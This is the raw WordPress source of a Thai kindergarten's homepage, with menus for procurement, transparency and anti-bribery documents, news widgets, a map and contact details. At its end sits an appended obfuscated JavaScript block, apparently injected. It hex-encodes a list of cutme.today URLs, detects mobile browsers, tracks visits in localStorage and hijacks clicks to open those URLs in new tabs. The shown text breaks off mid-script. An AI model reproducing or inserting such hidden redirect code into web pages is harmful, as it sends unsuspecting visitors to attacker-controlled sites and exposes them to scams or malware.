900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return 